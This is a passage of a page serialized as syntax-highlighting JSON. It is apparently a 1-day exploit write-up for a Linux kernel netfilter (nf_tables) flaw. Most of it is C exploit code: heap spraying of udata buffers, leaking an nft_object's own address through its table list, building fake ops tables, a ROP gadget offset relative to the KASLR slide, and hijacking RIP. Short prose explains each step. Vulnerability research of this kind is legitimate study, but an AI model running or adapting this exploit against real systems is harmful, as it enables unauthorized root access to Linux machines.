:10449},{"type":27,"tag":207,"props":62540,"children":62541},{"class":209,"line":2065},[62542],{"type":27,"tag":207,"props":62543,"children":62544},{"style":238},[62545],{"type":33,"value":36449},{"type":27,"tag":207,"props":62547,"children":62548},{"class":209,"line":2092},[62549,62554,62559,62564,62569,62574],{"type":27,"tag":207,"props":62550,"children":62551},{"style":1335},[62552],{"type":33,"value":62553}," snprintf",{"type":27,"tag":207,"props":62555,"children":62556},{"style":238},[62557],{"type":33,"value":62558},"(spray_name, ",{"type":27,"tag":207,"props":62560,"children":62561},{"style":214},[62562],{"type":33,"value":62563},"sizeof",{"type":27,"tag":207,"props":62565,"children":62566},{"style":238},[62567],{"type":33,"value":62568},"(spray_name), ",{"type":27,"tag":207,"props":62570,"children":62571},{"style":1325},[62572],{"type":33,"value":62573},"\"spray-%i\"",{"type":27,"tag":207,"props":62575,"children":62576},{"style":238},[62577],{"type":33,"value":62578},", i);\n",{"type":27,"tag":207,"props":62580,"children":62581},{"class":209,"line":2130},[62582,62587,62591,62595,62600],{"type":27,"tag":207,"props":62583,"children":62584},{"style":220},[62585],{"type":33,"value":62586}," udata",{"type":27,"tag":207,"props":62588,"children":62589},{"style":238},[62590],{"type":33,"value":61832},{"type":27,"tag":207,"props":62592,"children":62593},{"style":226},[62594],{"type":33,"value":10380},{"type":27,"tag":207,"props":62596,"children":62597},{"style":1335},[62598],{"type":33,"value":62599}," getudata",{"type":27,"tag":207,"props":62601,"children":62602},{"style":238},[62603],{"type":33,"value":62604},"(nl, spray_name);\n",{"type":27,"tag":207,"props":62606,"children":62607},{"class":209,"line":2168},[62608],{"type":27,"tag":207,"props":62609,"children":62610},{"style":238},[62611],{"type":33,"value":10645},{"type":27,"tag":207,"props":62613,"children":62614},{"class":209,"line":4095},[62615,62619,62623,62627,62631,62635,62639,62643,62647,62651,62656,62660,62664,62668,62672],{"type":27,"tag":207,"props":62616,"children":62617},{"style":376},[62618],{"type":33,"value":19556},{"type":27,"tag":207,"props":62620,"children":62621},{"style":238},[62622],{"type":33,"value":686},{"type":27,"tag":207,"props":62624,"children":62625},{"style":220},[62626],{"type":33,"value":62334},{"type":27,"tag":207,"props":62628,"children":62629},{"style":238},[62630],{"type":33,"value":11019},{"type":27,"tag":207,"props":62632,"children":62633},{"style":232},[62634],{"type":33,"value":1660},{"type":27,"tag":207,"props":62636,"children":62637},{"style":238},[62638],{"type":33,"value":56196},{"type":27,"tag":207,"props":62640,"children":62641},{"style":232},[62642],{"type":33,"value":1660},{"type":27,"tag":207,"props":62644,"children":62645},{"style":238},[62646],{"type":33,"value":15942},{"type":27,"tag":207,"props":62648,"children":62649},{"style":226},[62650],{"type":33,"value":15856},{"type":27,"tag":207,"props":62652,"children":62653},{"style":220},[62654],{"type":33,"value":62655}," udata",{"type":27,"tag":207,"props":62657,"children":62658},{"style":238},[62659],{"type":33,"value":11019},{"type":27,"tag":207,"props":62661,"children":62662},{"style":232},[62663],{"type":33,"value":1744},{"type":27,"tag":207,"props":62665,"children":62666},{"style":238},[62667],{"type":33,"value":56196},{"type":27,"tag":207,"props":62669,"children":62670},{"style":232},[62671],{"type":33,"value":1660},{"type":27,"tag":207,"props":62673,"children":62674},{"style":238},[62675],{"type":33,"value":62676},"])\n",{"type":27,"tag":207,"props":62678,"children":62679},{"class":209,"line":4103},[62680],{"type":27,"tag":207,"props":62681,"children":62682},{"style":238},[62683],{"type":33,"value":36449},{"type":27,"tag":207,"props":62685,"children":62686},{"class":209,"line":4154},[62687,62692,62696,62701],{"type":27,"tag":207,"props":62688,"children":62689},{"style":1335},[62690],{"type":33,"value":62691}," puts",{"type":27,"tag":207,"props":62693,"children":62694},{"style":238},[62695],{"type":33,"value":1343},{"type":27,"tag":207,"props":62697,"children":62698},{"style":1325},[62699],{"type":33,"value":62700},"\"[+] got duplicated table\"",{"type":27,"tag":207,"props":62702,"children":62703},{"style":238},[62704],{"type":33,"value":1455},{"type":27,"tag":207,"props":62706,"children":62707},{"class":209,"line":4203},[62708],{"type":27,"tag":207,"props":62709,"children":62710},{"style":238},[62711],{"type":33,"value":10645},{"type":27,"tag":207,"props":62713,"children":62714},{"class":209,"line":4249},[62715],{"type":27,"tag":207,"props":62716,"children":62717},{"emptyLinePlaceholder":19},[62718],{"type":33,"value":2062},{"type":27,"tag":207,"props":62720,"children":62721},{"class":209,"line":4290},[62722],{"type":27,"tag":207,"props":62723,"children":62724},{"style":4647},[62725],{"type":33,"value":62726}," // Replace one of the udata buffers with nft_object\n",{"type":27,"tag":207,"props":62728,"children":62729},{"class":209,"line":4304},[62730],{"type":27,"tag":207,"props":62731,"children":62732},{"style":4647},[62733],{"type":33,"value":62734}," // and read it's counterpart to leak the nft_object struct\n",{"type":27,"tag":207,"props":62736,"children":62737},{"class":209,"line":5466},[62738,62743,62747,62752],{"type":27,"tag":207,"props":62739,"children":62740},{"style":1335},[62741],{"type":33,"value":62742}," puts",{"type":27,"tag":207,"props":62744,"children":62745},{"style":238},[62746],{"type":33,"value":1343},{"type":27,"tag":207,"props":62748,"children":62749},{"style":1325},[62750],{"type":33,"value":62751},"\"[*] Info leak\"",{"type":27,"tag":207,"props":62753,"children":62754},{"style":238},[62755],{"type":33,"value":1455},{"type":27,"tag":207,"props":62757,"children":62758},{"class":209,"line":5530},[62759,62764,62769,62773,62777,62781],{"type":27,"tag":207,"props":62760,"children":62761},{"style":1335},[62762],{"type":33,"value":62763}," deludata_spray",{"type":27,"tag":207,"props":62765,"children":62766},{"style":238},[62767],{"type":33,"value":62768},"(nl, ",{"type":27,"tag":207,"props":62770,"children":62771},{"style":232},[62772],{"type":33,"value":1660},{"type":27,"tag":207,"props":62774,"children":62775},{"style":238},[62776],{"type":33,"value":1123},{"type":27,"tag":207,"props":62778,"children":62779},{"style":232},[62780],{"type":33,"value":1651},{"type":27,"tag":207,"props":62782,"children":62783},{"style":238},[62784],{"type":33,"value":1455},{"type":27,"tag":207,"props":62786,"children":62787},{"class":209,"line":7900},[62788,62793],{"type":27,"tag":207,"props":62789,"children":62790},{"style":1335},[62791],{"type":33,"value":62792}," wait_destroyer",{"type":27,"tag":207,"props":62794,"children":62795},{"style":238},[62796],{"type":33,"value":4301},{"type":27,"tag":207,"props":62798,"children":62799},{"class":209,"line":7909},[62800,62805,62809,62813,62817,62821,62825,62829,62833,62837],{"type":27,"tag":207,"props":62801,"children":62802},{"style":1335},[62803],{"type":33,"value":62804}," obj_spray",{"type":27,"tag":207,"props":62806,"children":62807},{"style":238},[62808],{"type":33,"value":62768},{"type":27,"tag":207,"props":62810,"children":62811},{"style":232},[62812],{"type":33,"value":1660},{"type":27,"tag":207,"props":62814,"children":62815},{"style":238},[62816],{"type":33,"value":1123},{"type":27,"tag":207,"props":62818,"children":62819},{"style":232},[62820],{"type":33,"value":1651},{"type":27,"tag":207,"props":62822,"children":62823},{"style":238},[62824],{"type":33,"value":1123},{"type":27,"tag":207,"props":62826,"children":62827},{"style":214},[62828],{"type":33,"value":61732},{"type":27,"tag":207,"props":62830,"children":62831},{"style":238},[62832],{"type":33,"value":1123},{"type":27,"tag":207,"props":62834,"children":62835},{"style":232},[62836],{"type":33,"value":1660},{"type":27,"tag":207,"props":62838,"children":62839},{"style":238},[62840],{"type":33,"value":1455},{"type":27,"tag":207,"props":62842,"children":62843},{"class":209,"line":7917},[62844,62849,62853,62858,62862,62866,62871,62875,62879,62884,62888,62893],{"type":27,"tag":207,"props":62845,"children":62846},{"style":214},[62847],{"type":33,"value":62848}," uint64_t",{"type":27,"tag":207,"props":62850,"children":62851},{"style":226},[62852],{"type":33,"value":17093},{"type":27,"tag":207,"props":62854,"children":62855},{"style":238},[62856],{"type":33,"value":62857},"fake_obj ",{"type":27,"tag":207,"props":62859,"children":62860},{"style":226},[62861],{"type":33,"value":10380},{"type":27,"tag":207,"props":62863,"children":62864},{"style":238},[62865],{"type":33,"value":686},{"type":27,"tag":207,"props":62867,"children":62868},{"style":214},[62869],{"type":33,"value":62870},"uint64_t",{"type":27,"tag":207,"props":62872,"children":62873},{"style":226},[62874],{"type":33,"value":17093},{"type":27,"tag":207,"props":62876,"children":62877},{"style":238},[62878],{"type":33,"value":10416},{"type":27,"tag":207,"props":62880,"children":62881},{"style":1335},[62882],{"type":33,"value":62883},"getudata",{"type":27,"tag":207,"props":62885,"children":62886},{"style":238},[62887],{"type":33,"value":62768},{"type":27,"tag":207,"props":62889,"children":62890},{"style":1325},[62891],{"type":33,"value":62892},"\"spray-2\"",{"type":27,"tag":207,"props":62894,"children":62895},{"style":238},[62896],{"type":33,"value":1455},{"type":27,"tag":207,"props":62898,"children":62899},{"class":209,"line":7926},[62900],{"type":27,"tag":207,"props":62901,"children":62902},{"style":238},[62903],{"type":33,"value":17595},{"type":27,"tag":58,"props":62905,"children":62907},{"id":62906},"leaking-self-pointer-of-nft_object",[62908,62910],{"type":33,"value":62909},"Leaking self pointer of ",{"type":27,"tag":84,"props":62911,"children":62913},{"className":62912},[],[62914],{"type":33,"value":62349},{"type":27,"tag":36,"props":62916,"children":62917},{},[62918,62920,62925,62927,62932,62934,62939,62941,62947],{"type":33,"value":62919},"As I'll discuss in more depth in the ROP section, the exploit relies on a known address of controllable memory to work. I decided to use the ",{"type":27,"tag":84,"props":62921,"children":62923},{"className":62922},[],[62924],{"type":33,"value":62349},{"type":33,"value":62926}," to get its own address. This is possible because the ",{"type":27,"tag":84,"props":62928,"children":62930},{"className":62929},[],[62931],{"type":33,"value":62349},{"type":33,"value":62933}," has a ",{"type":27,"tag":84,"props":62935,"children":62937},{"className":62936},[],[62938],{"type":33,"value":62334},{"type":33,"value":62940}," pointer (similar to ",{"type":27,"tag":84,"props":62942,"children":62944},{"className":62943},[],[62945],{"type":33,"value":62946},"table->udata",{"type":33,"value":62948}," that I used for leaking KASLR), that I can use to read/write data.",{"type":27,"tag":36,"props":62950,"children":62951},{},[62952,62953,62958,62960,62966,62968,62973,62975,62981,62983,62989,62991,62996,62998,63003,63005,63010,63012],{"type":33,"value":23888},{"type":27,"tag":84,"props":62954,"children":62956},{"className":62955},[],[62957],{"type":33,"value":62349},{"type":33,"value":62959}," struct also contains a ",{"type":27,"tag":84,"props":62961,"children":62963},{"className":62962},[],[62964],{"type":33,"value":62965},"list_head",{"type":33,"value":62967}," inserted in a circular list containing all ",{"type":27,"tag":84,"props":62969,"children":62971},{"className":62970},[],[62972],{"type":33,"value":62349},{"type":33,"value":62974},"'s that belong to a given ",{"type":27,"tag":84,"props":62976,"children":62978},{"className":62977},[],[62979],{"type":33,"value":62980},"table",{"type":33,"value":62982},". Considering that our object is currently alone in its table, the ",{"type":27,"tag":84,"props":62984,"children":62986},{"className":62985},[],[62987],{"type":33,"value":62988},"table->list.next",{"type":33,"value":62990}," pointer in the ",{"type":27,"tag":84,"props":62992,"children":62994},{"className":62993},[],[62995],{"type":33,"value":62349},{"type":33,"value":62997}," will point back to the ",{"type":27,"tag":84,"props":62999,"children":63001},{"className":63000},[],[63002],{"type":33,"value":62965},{"type":33,"value":63004}," contained in the ",{"type":27,"tag":84,"props":63006,"children":63008},{"className":63007},[],[63009],{"type":33,"value":62980},{"type":33,"value":63011}," and vice-versa.\n",{"type":27,"tag":126,"props":63013,"children":63015},{"alt":57817,"src":63014},"/posts/netfilter-universal-root-1-day/nft-object.png",[],{"type":27,"tag":36,"props":63017,"children":63018},{},[63019,63021,63026,63028,63033,63035,63041,63043,63048,63049,63054,63056,63061,63063,63068],{"type":33,"value":63020},"In short, that means that if we swap the ",{"type":27,"tag":84,"props":63022,"children":63024},{"className":63023},[],[63025],{"type":33,"value":62334},{"type":33,"value":63027}," pointer of the ",{"type":27,"tag":84,"props":63029,"children":63031},{"className":63030},[],[63032],{"type":33,"value":62349},{"type":33,"value":63034}," with its own ",{"type":27,"tag":84,"props":63036,"children":63038},{"className":63037},[],[63039],{"type":33,"value":63040},"list.next",{"type":33,"value":63042}," pointer we should be able to read a pointer back to the ",{"type":27,"tag":84,"props":63044,"children":63046},{"className":63045},[],[63047],{"type":33,"value":62349},{"type":33,"value":59575},{"type":27,"tag":84,"props":63050,"children":63052},{"className":63051},[],[63053],{"type":33,"value":62965},{"type":33,"value":63055}," which is also the start of the ",{"type":27,"tag":84,"props":63057,"children":63059},{"className":63058},[],[63060],{"type":33,"value":62349},{"type":33,"value":63062}," itself.\n",{"type":27,"tag":12606,"props":63064,"children":63065},{},[63066],{"type":33,"value":63067},"NOTE:",{"type":33,"value":63069}," This is a novel small trick.",{"type":27,"tag":101,"props":63071,"children":63073},{"className":8877,"code":63072,"language":8876,"meta":7,"style":7},"[...]\n // Leak nft_object ptr using table linked list\n fake_obj[8] = 8; // ulen = 8\n fake_obj[9] = fake_obj[0]; // udata = list->next\n deludata_spray(nl, 2, 1);\n wait_destroyer();\n udata_spray(nl, 0xe8, 3, 1, fake_obj);\n\n get_obj(nl, \"spray-0\", true);\n printf(\"[*] nft_object ptr: 0x%lx\\n\", obj_ptr);\n[...]\n",[63074],{"type":27,"tag":84,"props":63075,"children":63076},{"__ignoreMap":7},[63077,63084,63092,63105,63152,63179,63190,63228,63235,63264,63294],{"type":27,"tag":207,"props":63078,"children":63079},{"class":209,"line":210},[63080],{"type":27,"tag":207,"props":63081,"children":63082},{"style":238},[63083],{"type":33,"value":17595},{"type":27,"tag":207,"props":63085,"children":63086},{"class":209,"line":244},[63087],{"type":27,"tag":207,"props":63088,"children":63089},{"style":238},[63090],{"type":33,"value":63091}," // Leak nft_object ptr using table linked list\n",{"type":27,"tag":207,"props":63093,"children":63094},{"class":209,"line":270},[63095,63100],{"type":27,"tag":207,"props":63096,"children":63097},{"style":238},[63098],{"type":33,"value":63099}," fake_obj[8] = 8;",{"type":27,"tag":207,"props":63101,"children":63102},{"style":4647},[63103],{"type":33,"value":63104}," // ulen = 8\n",{"type":27,"tag":207,"props":63106,"children":63107},{"class":209,"line":296},[63108,63113,63117,63121,63125,63129,63134,63138,63142,63147],{"type":27,"tag":207,"props":63109,"children":63110},{"style":220},[63111],{"type":33,"value":63112}," fake_obj",{"type":27,"tag":207,"props":63114,"children":63115},{"style":238},[63116],{"type":33,"value":11019},{"type":27,"tag":207,"props":63118,"children":63119},{"style":232},[63120],{"type":33,"value":1778},{"type":27,"tag":207,"props":63122,"children":63123},{"style":238},[63124],{"type":33,"value":15942},{"type":27,"tag":207,"props":63126,"children":63127},{"style":226},[63128],{"type":33,"value":10380},{"type":27,"tag":207,"props":63130,"children":63131},{"style":220},[63132],{"type":33,"value":63133}," fake_obj",{"type":27,"tag":207,"props":63135,"children":63136},{"style":238},[63137],{"type":33,"value":11019},{"type":27,"tag":207,"props":63139,"children":63140},{"style":232},[63141],{"type":33,"value":1660},{"type":27,"tag":207,"props":63143,"children":63144},{"style":238},[63145],{"type":33,"value":63146},"];",{"type":27,"tag":207,"props":63148,"children":63149},{"style":4647},[63150],{"type":33,"value":63151}," // udata = list->next\n",{"type":27,"tag":207,"props":63153,"children":63154},{"class":209,"line":445},[63155,63159,63163,63167,63171,63175],{"type":27,"tag":207,"props":63156,"children":63157},{"style":1335},[63158],{"type":33,"value":62763},{"type":27,"tag":207,"props":63160,"children":63161},{"style":238},[63162],{"type":33,"value":62768},{"type":27,"tag":207,"props":63164,"children":63165},{"style":232},[63166],{"type":33,"value":1744},{"type":27,"tag":207,"props":63168,"children":63169},{"style":238},[63170],{"type":33,"value":1123},{"type":27,"tag":207,"props":63172,"children":63173},{"style":232},[63174],{"type":33,"value":1651},{"type":27,"tag":207,"props":63176,"children":63177},{"style":238},[63178],{"type":33,"value":1455},{"type":27,"tag":207,"props":63180,"children":63181},{"class":209,"line":867},[63182,63186],{"type":27,"tag":207,"props":63183,"children":63184},{"style":1335},[63185],{"type":33,"value":62792},{"type":27,"tag":207,"props":63187,"children":63188},{"style":238},[63189],{"type":33,"value":4301},{"type":27,"tag":207,"props":63191,"children":63192},{"class":209,"line":892},[63193,63198,63202,63207,63211,63215,63219,63223],{"type":27,"tag":207,"props":63194,"children":63195},{"style":1335},[63196],{"type":33,"value":63197}," udata_spray",{"type":27,"tag":207,"props":63199,"children":63200},{"style":238},[63201],{"type":33,"value":62768},{"type":27,"tag":207,"props":63203,"children":63204},{"style":232},[63205],{"type":33,"value":63206},"0xe8",{"type":27,"tag":207,"props":63208,"children":63209},{"style":238},[63210],{"type":33,"value":1123},{"type":27,"tag":207,"props":63212,"children":63213},{"style":232},[63214],{"type":33,"value":1735},{"type":27,"tag":207,"props":63216,"children":63217},{"style":238},[63218],{"type":33,"value":1123},{"type":27,"tag":207,"props":63220,"children":63221},{"style":232},[63222],{"type":33,"value":1651},{"type":27,"tag":207,"props":63224,"children":63225},{"style":238},[63226],{"type":33,"value":63227},", fake_obj);\n",{"type":27,"tag":207,"props":63229,"children":63230},{"class":209,"line":1475},[63231],{"type":27,"tag":207,"props":63232,"children":63233},{"emptyLinePlaceholder":19},[63234],{"type":33,"value":2062},{"type":27,"tag":207,"props":63236,"children":63237},{"class":209,"line":2065},[63238,63243,63247,63252,63256,63260],{"type":27,"tag":207,"props":63239,"children":63240},{"style":1335},[63241],{"type":33,"value":63242}," get_obj",{"type":27,"tag":207,"props":63244,"children":63245},{"style":238},[63246],{"type":33,"value":62768},{"type":27,"tag":207,"props":63248,"children":63249},{"style":1325},[63250],{"type":33,"value":63251},"\"spray-0\"",{"type":27,"tag":207,"props":63253,"children":63254},{"style":238},[63255],{"type":33,"value":1123},{"type":27,"tag":207,"props":63257,"children":63258},{"style":214},[63259],{"type":33,"value":11278},{"type":27,"tag":207,"props":63261,"children":63262},{"style":238},[63263],{"type":33,"value":1455},{"type":27,"tag":207,"props":63265,"children":63266},{"class":209,"line":2092},[63267,63272,63276,63281,63285,63289],{"type":27,"tag":207,"props":63268,"children":63269},{"style":1335},[63270],{"type":33,"value":63271}," printf",{"type":27,"tag":207,"props":63273,"children":63274},{"style":238},[63275],{"type":33,"value":1343},{"type":27,"tag":207,"props":63277,"children":63278},{"style":1325},[63279],{"type":33,"value":63280},"\"[*] nft_object ptr: 0x%lx",{"type":27,"tag":207,"props":63282,"children":63283},{"style":55613},[63284],{"type":33,"value":55616},{"type":27,"tag":207,"props":63286,"children":63287},{"style":1325},[63288],{"type":33,"value":27331},{"type":27,"tag":207,"props":63290,"children":63291},{"style":238},[63292],{"type":33,"value":63293},", obj_ptr);\n",{"type":27,"tag":207,"props":63295,"children":63296},{"class":209,"line":2130},[63297],{"type":27,"tag":207,"props":63298,"children":63299},{"style":238},[63300],{"type":33,"value":17595},{"type":27,"tag":58,"props":63302,"children":63304},{"id":63303},"hijacking-control-flow",[63305],{"type":33,"value":63306},"Hijacking control-flow",{"type":27,"tag":36,"props":63308,"children":63309},{},[63310,63312,63317,63319,63324,63326,63331,63333,63338,63340,63345,63347],{"type":33,"value":63311},"To hijack control-flow, we can use ",{"type":27,"tag":84,"props":63313,"children":63315},{"className":63314},[],[63316],{"type":33,"value":62349},{"type":33,"value":63318}," once again. The ",{"type":27,"tag":84,"props":63320,"children":63322},{"className":63321},[],[63323],{"type":33,"value":62349},{"type":33,"value":63325}," struct has an ",{"type":27,"tag":84,"props":63327,"children":63329},{"className":63328},[],[63330],{"type":33,"value":59906},{"type":33,"value":63332}," pointer to a function pointer table. We can swap the ",{"type":27,"tag":84,"props":63334,"children":63336},{"className":63335},[],[63337],{"type":33,"value":59906},{"type":33,"value":63339}," pointer with the ",{"type":27,"tag":84,"props":63341,"children":63343},{"className":63342},[],[63344],{"type":33,"value":62334},{"type":33,"value":63346}," pointer, taking control of the pointer table.\n",{"type":27,"tag":126,"props":63348,"children":63350},{"alt":57817,"src":63349},"/posts/netfilter-universal-root-1-day/control-flow.png",[],{"type":27,"tag":101,"props":63352,"children":63354},{"className":8877,"code":63353,"language":8876,"meta":7,"style":7},"[...]\n // Fake ops\n uint64_t *rop = calloc(29, sizeof(uint64_t));\n rop[0] = kaslr_slide + 0xffffffff81988647; // push rsi; jmp qword ptr [rsi + 0x39];\n rop[2] = kaslr_slide + NFT_CT_EXPECT_OBJ_TYPE;\n[...]\n // Send ROP in object udata\n del_obj(nl, \"spray-0\");\n wait_destroyer();\n obj_spray(nl, 1, 1, rop, 0xb8);\n fake_obj = (uint64_t *)getudata(nl, \"spray-3\");\n DumpHex(fake_obj, 0xe8);\n uint64_t rop_addr = fake_obj[9]; // udata ptr\n printf(\"[*] ROP addr: 0x%lx\\n\", rop_addr);\n\n // Point to fake ops\n fake_obj[16] = rop_addr - 0x20; // Point ops to fake ptr table\n[...]\n // Write ROP\n puts(\"[*] Write ROP\");\n deludata_spray(nl, 3, 1);\n wait_destroyer();\n udata_spray(nl, 0xe8, 4, 1, fake_obj);\n\n // Takeover RIP\n puts(\"[*] Takeover RIP\");\n dump_obj(nl, \"spray-1\");\n[...]\n",[63355],{"type":27,"tag":84,"props":63356,"children":63357},{"__ignoreMap":7},[63358,63365,63373,63397,63444,63480,63487,63495,63527,63535,63543,63564,63572,63580,63643,63650,63658,63666,63673,63681,63715,63723,63730,63738,63745,63753,63786,63807],{"type":27,"tag":207,"props":63359,"children":63360},{"class":209,"line":210},[63361],{"type":27,"tag":207,"props":63362,"children":63363},{"style":238},[63364],{"type":33,"value":17595},{"type":27,"tag":207,"props":63366,"children":63367},{"class":209,"line":244},[63368],{"type":27,"tag":207,"props":63369,"children":63370},{"style":238},[63371],{"type":33,"value":63372}," // Fake ops\n",{"type":27,"tag":207,"props":63374,"children":63375},{"class":209,"line":270},[63376,63381,63385,63389,63393],{"type":27,"tag":207,"props":63377,"children":63378},{"style":238},[63379],{"type":33,"value":63380}," uint64_t *rop = calloc(29, ",{"type":27,"tag":207,"props":63382,"children":63383},{"style":8920},[63384],{"type":33,"value":62563},{"type":27,"tag":207,"props":63386,"children":63387},{"style":238},[63388],{"type":33,"value":1343},{"type":27,"tag":207,"props":63390,"children":63391},{"style":214},[63392],{"type":33,"value":62870},{"type":27,"tag":207,"props":63394,"children":63395},{"style":238},[63396],{"type":33,"value":14505},{"type":27,"tag":207,"props":63398,"children":63399},{"class":209,"line":296},[63400,63405,63409,63413,63417,63421,63426,63430,63435,63439],{"type":27,"tag":207,"props":63401,"children":63402},{"style":220},[63403],{"type":33,"value":63404}," rop",{"type":27,"tag":207,"props":63406,"children":63407},{"style":238},[63408],{"type":33,"value":11019},{"type":27,"tag":207,"props":63410,"children":63411},{"style":232},[63412],{"type":33,"value":1660},{"type":27,"tag":207,"props":63414,"children":63415},{"style":238},[63416],{"type":33,"value":15942},{"type":27,"tag":207,"props":63418,"children":63419},{"style":226},[63420],{"type":33,"value":10380},{"type":27,"tag":207,"props":63422,"children":63423},{"style":238},[63424],{"type":33,"value":63425}," kaslr_slide ",{"type":27,"tag":207,"props":63427,"children":63428},{"style":226},[63429],{"type":33,"value":2227},{"type":27,"tag":207,"props":63431,"children":63432},{"style":232},[63433],{"type":33,"value":63434}," 0xffffffff81988647",{"type":27,"tag":207,"props":63436,"children":63437},{"style":238},[63438],{"type":33,"value":56312},{"type":27,"tag":207,"props":63440,"children":63441},{"style":4647},[63442],{"type":33,"value":63443}," // push rsi; jmp qword ptr [rsi + 0x39];\n",{"type":27,"tag":207,"props":63445,"children":63446},{"class":209,"line":445},[63447,63451,63455,63459,63463,63467,63471,63475],{"type":27,"tag":207,"props":63448,"children":63449},{"style":220},[63450],{"type":33,"value":63404},{"type":27,"tag":207,"props":63452,"children":63453},{"style":238},[63454],{"type":33,"value":11019},{"type":27,"tag":207,"props":63456,"children":63457},{"style":232},[63458],{"type":33,"value":1744},{"type":27,"tag":207,"props":63460,"children":63461},{"style":238},[63462],{"type":33,"value":15942},{"type":27,"tag":207,"props":63464,"children":63465},{"style":226},[63466],{"type":33,"value":10380},{"type":27,"tag":207,"props":63468,"children":63469},{"style":238},[63470],{"type":33,"value":63425},{"type":27,"tag":207,"props":63472,"children":63473},{"style":226},[63474],{"type":33,"value":2227},{"type":27,"tag":207,"props":63476,"children":63477},{"style":238},[63478],{"type":33,"value":63479}," NFT_CT_EXPECT_OBJ_TYPE;\n",{"type":27,"tag":207,"props":63481,"children":63482},{"class":209,"line":867},[63483],{"type":27,"tag":207,"props":63484,"children":63485},{"style":238},[63486],{"type":33,"value":17595},{"type":27,"tag":207,"props":63488,"children":63489},{"class":209,"line":892},[63490],{"type":27,"tag":207,"props":63491,"children":63492},{"style":238},[63493],{"type":33,"value":63494}," // Send ROP in object udata\n",{"type":27,"tag":207,"props":63496,"children":63497},{"class":209,"line":1475},[63498,63503,63507,63512,63517,63522],{"type":27,"tag":207,"props":63499,"children":63500},{"style":238},[63501],{"type":33,"value":63502}," del_obj(",{"type":27,"tag":207,"props":63504,"children":63505},{"style":8920},[63506],{"type":33,"value":61526},{"type":27,"tag":207,"props":63508,"children":63509},{"style":238},[63510],{"type":33,"value":63511},", \"",{"type":27,"tag":207,"props":63513,"children":63514},{"style":8920},[63515],{"type":33,"value":63516},"spray",{"type":27,"tag":207,"props":63518,"children":63519},{"style":238},[63520],{"type":33,"value":63521},"-0",{"type":27,"tag":207,"props":63523,"children":63524},{"style":1325},[63525],{"type":33,"value":63526},"\");\n",{"type":27,"tag":207,"props":63528,"children":63529},{"class":209,"line":2065},[63530],{"type":27,"tag":207,"props":63531,"children":63532},{"style":1325},[63533],{"type":33,"value":63534}," wait_destroyer();\n",{"type":27,"tag":207,"props":63536,"children":63537},{"class":209,"line":2092},[63538],{"type":27,"tag":207,"props":63539,"children":63540},{"style":1325},[63541],{"type":33,"value":63542}," obj_spray(nl, 1, 1, rop, 0xb8);\n",{"type":27,"tag":207,"props":63544,"children":63545},{"class":209,"line":2130},[63546,63551,63555,63560],{"type":27,"tag":207,"props":63547,"children":63548},{"style":1325},[63549],{"type":33,"value":63550}," fake_obj = (uint64_t *)getudata(nl, \"",{"type":27,"tag":207,"props":63552,"children":63553},{"style":214},[63554],{"type":33,"value":63516},{"type":27,"tag":207,"props":63556,"children":63557},{"style":238},[63558],{"type":33,"value":63559},"-3",{"type":27,"tag":207,"props":63561,"children":63562},{"style":1325},[63563],{"type":33,"value":63526},{"type":27,"tag":207,"props":63565,"children":63566},{"class":209,"line":2168},[63567],{"type":27,"tag":207,"props":63568,"children":63569},{"style":1325},[63570],{"type":33,"value":63571}," DumpHex(fake_obj, 0xe8);\n",{"type":27,"tag":207,"props":63573,"children":63574},{"class":209,"line":4095},[63575],{"type":27,"tag":207,"props":63576,"children":63577},{"style":1325},[63578],{"type":33,"value":63579}," uint64_t rop_addr = fake_obj[9]; // udata ptr\n",{"type":27,"tag":207,"props":63581,"children":63582},{"class":209,"line":4103},[63583,63588,63592,63596,63600,63605,63610,63615,63619,63623,63628,63633,63638],{"type":27,"tag":207,"props":63584,"children":63585},{"style":1325},[63586],{"type":33,"value":63587}," printf(\"",{"type":27,"tag":207,"props":63589,"children":63590},{"style":238},[63591],{"type":33,"value":11019},{"type":27,"tag":207,"props":63593,"children":63594},{"style":226},[63595],{"type":33,"value":9286},{"type":27,"tag":207,"props":63597,"children":63598},{"style":238},[63599],{"type":33,"value":15942},{"type":27,"tag":207,"props":63601,"children":63602},{"style":8920},[63603],{"type":33,"value":63604},"ROP",{"type":27,"tag":207,"props":63606,"children":63607},{"style":8920},[63608],{"type":33,"value":63609}," addr",{"type":27,"tag":207,"props":63611,"children":63612},{"style":238},[63613],{"type":33,"value":63614},": 0",{"type":27,"tag":207,"props":63616,"children":63617},{"style":8920},[63618],{"type":33,"value":26546},{"type":27,"tag":207,"props":63620,"children":63621},{"style":238},[63622],{"type":33,"value":2071},{"type":27,"tag":207,"props":63624,"children":63625},{"style":8920},[63626],{"type":33,"value":63627},"lx",{"type":27,"tag":207,"props":63629,"children":63630},{"style":238},[63631],{"type":33,"value":63632},"\\",{"type":27,"tag":207,"props":63634,"children":63635},{"style":8920},[63636],{"type":33,"value":63637},"n",{"type":27,"tag":207,"props":63639,"children":63640},{"style":1325},[63641],{"type":33,"value":63642},"\", rop_addr);\n",{"type":27,"tag":207,"props":63644,"children":63645},{"class":209,"line":4154},[63646],{"type":27,"tag":207,"props":63647,"children":63648},{"emptyLinePlaceholder":19},[63649],{"type":33,"value":2062},{"type":27,"tag":207,"props":63651,"children":63652},{"class":209,"line":4203},[63653],{"type":27,"tag":207,"props":63654,"children":63655},{"style":1325},[63656],{"type":33,"value":63657}," // Point to fake ops\n",{"type":27,"tag":207,"props":63659,"children":63660},{"class":209,"line":4249},[63661],{"type":27,"tag":207,"props":63662,"children":63663},{"style":1325},[63664],{"type":33,"value":63665}," fake_obj[16] = rop_addr - 0x20; // Point ops to fake ptr table\n",{"type":27,"tag":207,"props":63667,"children":63668},{"class":209,"line":4290},[63669],{"type":27,"tag":207,"props":63670,"children":63671},{"style":1325},[63672],{"type":33,"value":17595},{"type":27,"tag":207,"props":63674,"children":63675},{"class":209,"line":4304},[63676],{"type":27,"tag":207,"props":63677,"children":63678},{"style":1325},[63679],{"type":33,"value":63680}," // Write ROP\n",{"type":27,"tag":207,"props":63682,"children":63683},{"class":209,"line":5466},[63684,63689,63693,63697,63701,63706,63711],{"type":27,"tag":207,"props":63685,"children":63686},{"style":1325},[63687],{"type":33,"value":63688}," puts(\"",{"type":27,"tag":207,"props":63690,"children":63691},{"style":238},[63692],{"type":33,"value":11019},{"type":27,"tag":207,"props":63694,"children":63695},{"style":226},[63696],{"type":33,"value":9286},{"type":27,"tag":207,"props":63698,"children":63699},{"style":238},[63700],{"type":33,"value":15942},{"type":27,"tag":207,"props":63702,"children":63703},{"style":8920},[63704],{"type":33,"value":63705},"Write",{"type":27,"tag":207,"props":63707,"children":63708},{"style":8920},[63709],{"type":33,"value":63710}," 